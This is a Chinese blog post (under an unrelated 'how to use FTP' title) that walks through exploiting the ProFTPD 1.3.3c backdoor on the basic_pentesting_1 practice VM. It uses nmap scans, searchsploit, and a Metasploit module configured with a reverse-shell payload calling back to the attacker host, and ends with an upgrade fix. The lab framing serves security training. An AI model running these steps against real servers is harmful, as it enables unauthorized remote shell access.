ftp服务怎么用(ftp服务器教程)

影响范围

ProFTPD 1.3.3c

漏洞介绍

ProFTPD是一种高度可定制和可扩展的FTP服务器软件,它提供了一种安全和可靠的方式来传输文件和数据,它支持多种操作系统,包括类Unix系统(例如:Linux、FreeBSD等)和Windows,在其1.3.3c软件包中存在一处命令执行的后门漏洞,攻击者可以直接进行命令执行获取服务器端的Shell权限

漏洞利用

这里以\\”basic_pentesting_1\\”靶机中的ProFTPD 1.3.3c版本为例进行漏洞的检测与利用,首先执行以下命令来获取目标主机的IP地址信息

nmap -sn 192.168.204.0/24

服务端口扫描:

nmap -A -T4 -v 192.168.204.144

ftp服务怎么用(ftp服务器教程)

从上面的扫描结果可以看到目标服务器开启了21、22、80端口,而且注意到目标服务器中的FTP服务版本为ProFTPD 1.3.3c,所以我们可以直接利用该服务对应的漏洞对目标服务器实施攻击操作,首先我们使用searchsploit进行漏洞的检索操作

searchsploit ProFTOD 1.3.3c

ftp服务怎么用(ftp服务器教程)

随后我们直接在MSF中检索漏洞利用模块

msfconsolesearch ProFTOD 1.3.3c

ftp服务怎么用(ftp服务器教程)

    msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.204.144RHOSTS => 192.168.204.144msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RPORT 21RPORT => 21msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reversepayload => cmd/unix/reversemsf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.204.135lhost => 192.168.204.135msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options

    随后执行载荷并成功获取到目标服务器的权限

    修复建议

    升级到FTPD的最新版本

    参考连接

    https://www.cnvd.org.cn/flaw/show/CNVD-2010-3023

    原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34237.html

    Like (0)
    七芒星实验室的头像七芒星实验室
    Previous 2024年4月4日
    Next 2024年4月4日

    相关推荐

    发表回复

    您的邮箱地址不会被公开。 必填项已用 * 标注